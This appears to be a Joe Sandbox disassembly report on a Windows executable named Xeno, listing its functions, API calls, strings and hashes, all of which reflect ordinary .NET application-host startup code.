Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: &arch=$&os=$&rid=$https://aka.ms/dotnet-core-applaunch?$missing_runtime=true$win10$x64
API String ID: 3936042273-2126368634
Opcode ID: c4cc6ff32b69a53a8f7845ac237a2d8c364f35f14854b6096570883cc5d25366
Instruction ID: e70107125f6c0e7768bf2cb5b6e50b1949d63293a578e69745431c1a3ddf02ea
Opcode Fuzzy Hash: c4cc6ff32b69a53a8f7845ac237a2d8c364f35f14854b6096570883cc5d25366
Instruction Fuzzy Hash: 44B18BA2B14B45D1EB10EF25D5003AD2361FB84B98F80563BDE5D87B98EF78E158C351

Function 00007FF68D5EECD0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 164COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED48
MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED8B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEEC8

Part of subcall function 00007FF68D5E77D0: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7821
Part of subcall function 00007FF68D5E77D0: __stdio_common_vsnwprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E78F1
Part of subcall function 00007FF68D5E77D0: OutputDebugStringW.KERNEL32 ref: 00007FF68D5E78FA
Part of subcall function 00007FF68D5E77D0: SwitchToThread.KERNEL32 ref: 00007FF68D5E792B
Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E795D
Part of subcall function 00007FF68D5E77D0: fputws.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E796E
Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7979
Part of subcall function 00007FF68D5E77D0: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7987

Strings

The managed DLL bound to this executable is: '%s', xrefs: 00007FF68D5EEE8F
This executable is not bound to a managed DLL to execute. The binding value is: '%s', xrefs: 00007FF68D5EEE72
XenoUI.dll, xrefs: 00007FF68D5EECFA
The managed DLL bound to this executable could not be retrieved from the executable image., xrefs: 00007FF68D5EEEDC
c3ab8ff13720e8ad9047dd39466b3c89, xrefs: 00007FF68D5EEE0A
74e592c2fa383d4a3960714caef0c4f2, xrefs: 00007FF68D5EEE50

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: ByteCharMultiWide__acrt_iob_func$DebugOutputStringSwitchThread__stdio_common_vsnwprintf_s__stdio_common_vswprintf_invalid_parameter_noinfo_noreturnfputwcfputws
String ID: 74e592c2fa383d4a3960714caef0c4f2$The managed DLL bound to this executable could not be retrieved from the executable image.$The managed DLL bound to this executable is: '%s'$This executable is not bound to a managed DLL to execute. The binding value is: '%s'$XenoUI.dll$c3ab8ff13720e8ad9047dd39466b3c89
API String ID: 804575459-2944702120
Opcode ID: ec0c915271d4d2f5bd3cd1049913cce54fa24223ccabbab7e11f737cf6f4db4f
Instruction ID: 792bffb538eacdcb9c088430d987443ef112af9d8b73464c229213b2e3baa461
Opcode Fuzzy Hash: ec0c915271d4d2f5bd3cd1049913cce54fa24223ccabbab7e11f737cf6f4db4f
Instruction Fuzzy Hash: D7511261B18A81C5EB20AF25E5001B96391FF48BC0F44153BDE5D97B99EF7CEA49C321

Function 00007FF68D5EB8B0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 158libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF68D5EB98E
GetLastError.KERNEL32 ref: 00007FF68D5EB99C
GetModuleHandleExW.KERNEL32 ref: 00007FF68D5EB9E9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EBAA0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EBAE5

Strings

Loaded library from %s, xrefs: 00007FF68D5EBA5C
pal::load_library, xrefs: 00007FF68D5EBA01
Failed to pin library [%s] in [%s], xrefs: 00007FF68D5EBA08
Failed to load the dll from [%s], HRESULT: 0x%X, xrefs: 00007FF68D5EB9BF

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorHandleLastLibraryLoadModule
String ID: Failed to load the dll from [%s], HRESULT: 0x%X$Failed to pin library [%s] in [%s]$Loaded library from %s$pal::load_library
API String ID: 2518456378-4234151505
Opcode ID: 922d6f426139b8e99b942e8ef66e00f144c712bddc2d8eb17f78f43507c79a88
Instruction ID: 378becf0a49b1d1290404cd0c309e9503ff6a0f6c44853e1e195d01ef91afaad
Opcode Fuzzy Hash: 922d6f426139b8e99b942e8ef66e00f144c712bddc2d8eb17f78f43507c79a88
Instruction Fuzzy Hash: D661A1A2F14A12C8FF00AB65D4502FD23A1BF04B95F94513BDE5DA6A98FF78D489C321

Function 00007FF68D5ED920 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF68D5ED933
GetLastError.KERNEL32 ref: 00007FF68D5ED93E

Part of subcall function 00007FF68D5E7720: SwitchToThread.KERNEL32 ref: 00007FF68D5E776C
Part of subcall function 00007FF68D5E7720: __stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77A4
Part of subcall function 00007FF68D5E7720: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77B2

GetProcAddress.KERNEL32 ref: 00007FF68D5ED968
GetCurrentProcess.KERNEL32 ref: 00007FF68D5ED976
GetLastError.KERNEL32 ref: 00007FF68D5ED996

Strings

Could not load 'kernel32.dll': %u, xrefs: 00007FF68D5ED946
IsWow64Process2, xrefs: 00007FF68D5ED959
kernel32.dll, xrefs: 00007FF68D5ED926
Call to IsWow64Process2 failed: %u, xrefs: 00007FF68D5ED99E

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: ErrorLast$AddressCurrentLibraryLoadProcProcessSwitchThread__stdio_common_vfwprintffputwc
String ID: Call to IsWow64Process2 failed: %u$Could not load 'kernel32.dll': %u$IsWow64Process2$kernel32.dll
API String ID: 1662406701-4196934218
Opcode ID: 2a196a475a1ef3129848e97716497868948c1f0ec471aac66cc9e033bbd63ac5
Instruction ID: c4566bb208a16fbc0ffd4fa0bbade9d6e4e07a845988d3bd4cb13800ee9359b2
Opcode Fuzzy Hash: 2a196a475a1ef3129848e97716497868948c1f0ec471aac66cc9e033bbd63ac5
Instruction Fuzzy Hash: B5115215F09A42C2EF50AB11E8402A523A1FF88B81F44503BDD4DCA358FE7CE10DC722

Function 00007FF68D5F2F9C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 319COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF68D5F313A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF68D5F3463
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F3479
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F3491
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F3497

Strings

csm, xrefs: 00007FF68D5F3161
csm, xrefs: 00007FF68D5F3081
csm, xrefs: 00007FF68D5F30E3

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: terminate$Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 695522112-393685449
Opcode ID: f28acaadb3c49b9303a4fb65d60bb45bbab11cab4959214b783e81408c66f729
Instruction ID: 9d7e9f04bc370c270b5c7caef05b8322d9c0b38445931f5e9e712deb86f5c229
Opcode Fuzzy Hash: f28acaadb3c49b9303a4fb65d60bb45bbab11cab4959214b783e81408c66f729
Instruction Fuzzy Hash: D0E19072908682CAF720DF64D4442AD3BA0FF45788F14413ADE8DDB696EF78E589C712

Function 00007FF68D5EA310 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 288COMMON

Download Yara Rule

Strings

invalid stoul argument, xrefs: 00007FF68D5EA6BF, 00007FF68D5EA6D9
stoul argument out of range, xrefs: 00007FF68D5EA6B2, 00007FF68D5EA6CC

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID:
String ID: invalid stoul argument$stoul argument out of range
API String ID: 0-1365241121
Opcode ID: e70d4fe1e4e8372d666b61306ebc1a38f3a2c9116e0c00419a925fb0b016ee5e
Instruction ID: b5fbe54b587932aa4e2d5c30b8d2c5bec54d7b6e601f87f3762bb2a5f82a2a53
Opcode Fuzzy Hash: e70d4fe1e4e8372d666b61306ebc1a38f3a2c9116e0c00419a925fb0b016ee5e
Instruction Fuzzy Hash: 09B1C262F04A51D5EB10AB76C4402BC23A1BF44BA4F55063BDE2E977D4EF78E849C362

Function 00007FF68D5E87B0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

toupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF68D5E8853
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E88D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E8929
GetCurrentProcess.KERNEL32 ref: 00007FF68D5E8957
IsWow64Process.KERNEL32 ref: 00007FF68D5E8965

Part of subcall function 00007FF68D5E8380: GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E83E7
Part of subcall function 00007FF68D5E8380: GetLastError.KERNEL32 ref: 00007FF68D5E83F3
Part of subcall function 00007FF68D5E8380: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E8580

Strings

DOTNET_ROOT, xrefs: 00007FF68D5E89E9, 00007FF68D5E89FF
DOTNET_ROOT_, xrefs: 00007FF68D5E886C
DOTNET_ROOT(x86), xrefs: 00007FF68D5E898E, 00007FF68D5E89A4

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Process$CurrentEnvironmentErrorLastVariableWow64toupper
String ID: DOTNET_ROOT$DOTNET_ROOT(x86)$DOTNET_ROOT_
API String ID: 2548692714-2596692933
Opcode ID: 6dfc282151492951d4be0e1921aac29ae8c702ebc842023ab1fe9f72c852e54d
Instruction ID: cd7a34d95f9bc02b9b17dbb00e39b86df4ea1ee07fcfe0c4caf2c405c40c99ee
Opcode Fuzzy Hash: 6dfc282151492951d4be0e1921aac29ae8c702ebc842023ab1fe9f72c852e54d
Instruction Fuzzy Hash: DE71E762E08A41C1EA10AB15D54037D2761FF85BE4F84463BDE5D87AD5EF7CE188C352

Function 00007FF68D5F0C60 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF68D5F0C6D
GetProcAddress.KERNEL32 ref: 00007FF68D5F0C80
GetProcAddress.KERNEL32 ref: 00007FF68D5F0C97
GetProcAddress.KERNEL32 ref: 00007FF68D5F0CAE

Strings

GetTempPath2W, xrefs: 00007FF68D5F0C9D
GetSystemTimePreciseAsFileTime, xrefs: 00007FF68D5F0C86
kernel32.dll, xrefs: 00007FF68D5F0C66
GetCurrentPackageId, xrefs: 00007FF68D5F0C76

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 37bc658b66a3ee2dc263f53ce1848975e34876866f8e2a8c49aafa1a62849c2a
Instruction ID: a9dad86bf17861e20bce0d2f1783d3a6bf7231e401646dd834ba4601789fc823
Opcode Fuzzy Hash: 37bc658b66a3ee2dc263f53ce1848975e34876866f8e2a8c49aafa1a62849c2a
Instruction Fuzzy Hash: 5DF0DA64E09F07C1EA008B61B8544A02365FF08B91F40403ACC2E8A360FFBCA19DD722

Function 00007FF68D5E81B0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E8204
GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E823B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E8249
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF68D5E82D9

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5E826C
win-x64, xrefs: 00007FF68D5E828C
DOTNET_RUNTIME_ID, xrefs: 00007FF68D5E81FD, 00007FF68D5E8234, 00007FF68D5E8265

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: EnvironmentVariable$ErrorLast_invalid_parameter_noinfo_noreturn
String ID: DOTNET_RUNTIME_ID$Failed to read environment variable [%s], HRESULT: 0x%X$win-x64
API String ID: 1438037791-340911207
Opcode ID: afcabb24bc793c5cd4695cc977daa818da5e7fa2d766a58c4012187ef9e1bece
Instruction ID: b4bf05766ca9e1f7944b85166c5b3ca95e794c36a172930bb2efc171c0afb7e2
Opcode Fuzzy Hash: afcabb24bc793c5cd4695cc977daa818da5e7fa2d766a58c4012187ef9e1bece
Instruction Fuzzy Hash: 7541C821A18B82C1E6109B26E84026A6361FF85BD0F44523BEE9D97B95EF7CE188C711

Function 00007FF68D5F4B3C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BC1
GetLastError.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BCF
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BE8
LoadLibraryExW.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4BF9
FreeLibrary.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4C67
GetProcAddress.KERNEL32(?,?,?,00007FF68D5F4DEE,?,?,?,00007FF68D5F4A44,?,?,?,00007FF68D5F26C9), ref: 00007FF68D5F4C73

Strings

api-ms-, xrefs: 00007FF68D5F4BE1

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: f9b9bc4cd250af293ed6bb77090b9453b9b5a735e3b41d4d1f8e3331029902ce
Instruction ID: edac18a2984aceb3c2af8795b2e737f8bdf3c5b29aa2dab442bc06fd10fedcd9
Opcode Fuzzy Hash: f9b9bc4cd250af293ed6bb77090b9453b9b5a735e3b41d4d1f8e3331029902ce
Instruction Fuzzy Hash: 0131D221A1AA42D1EE15AB46E4006792295FF44B64F49193ADD1D9F780FEBCE448C722

Function 00007FF68D5E8380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E83E7
GetLastError.KERNEL32 ref: 00007FF68D5E83F3
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E844E

Part of subcall function 00007FF68D5E6600: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E674E
Part of subcall function 00007FF68D5E6600: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E675B

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E8580

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5E8416
Did not find [%s] directory [%s], xrefs: 00007FF68D5E8539

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskErrorLast
String ID: Did not find [%s] directory [%s]$Failed to read environment variable [%s], HRESULT: 0x%X
API String ID: 4061399417-4112875940
Opcode ID: d81a996b1cb7a28f5bf7b380b0923397d70d43b5237310d7261fa3eaa4562c9b
Instruction ID: 93afda93bf6c1fa5ceb17765c0cc49aa68cec99d02a2ada89351c46b3c5f54cb
Opcode Fuzzy Hash: d81a996b1cb7a28f5bf7b380b0923397d70d43b5237310d7261fa3eaa4562c9b
Instruction Fuzzy Hash: AB51FA62A18641D1EB20EF15E4002AE6761FF88BD4F84423BEE9E87795EF7CD448C751

Function 00007FF68D5E98B0 Relevance: 9.2, APIs: 6, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68D5E6070: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E6195

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9B08

Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9B6C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9BAB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9BEB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9BF1

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$malloc
String ID:
API String ID: 3700908427-0
Opcode ID: cb6097c60cf60780d18170efc2a8bd56a44369b06fadb145ad7da12436b509b1
Instruction ID: a084b0ded541f7dd3e6d19d9e7ce0a065b950b41515d2102200f9de68590d69d
Opcode Fuzzy Hash: cb6097c60cf60780d18170efc2a8bd56a44369b06fadb145ad7da12436b509b1
Instruction Fuzzy Hash: 9D91F362E18B42C1EA10EB55E44476D62A5FF447A0F44473AEEAD83BC4EF7CE088C711

Function 00007FF68D5E9C10 Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68D5E6070: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E6195

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9E61

Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9EC4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E9F03
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9F43
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E9F49

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$malloc
String ID:
API String ID: 3700908427-0
Opcode ID: 33a1df6c60be62bd28c6420927faa5315ee236f923c388ab469a260e4dad78c3
Instruction ID: 42139b84dcd78c420c4e24ee5cf87240d74295e5d7f84cd3f8bc294d74348f71
Opcode Fuzzy Hash: 33a1df6c60be62bd28c6420927faa5315ee236f923c388ab469a260e4dad78c3
Instruction Fuzzy Hash: EB91C772A18B41C1EA10AB65E40036962A1FF447A4F50473AEEBD47BD9EF7CE489C711

Function 00007FF68D5E6770 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68D5E6785
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68D5E67AA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68D5E67D4
std::_Facet_Register.LIBCPMT ref: 00007FF68D5E684B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68D5E686C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E687F

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
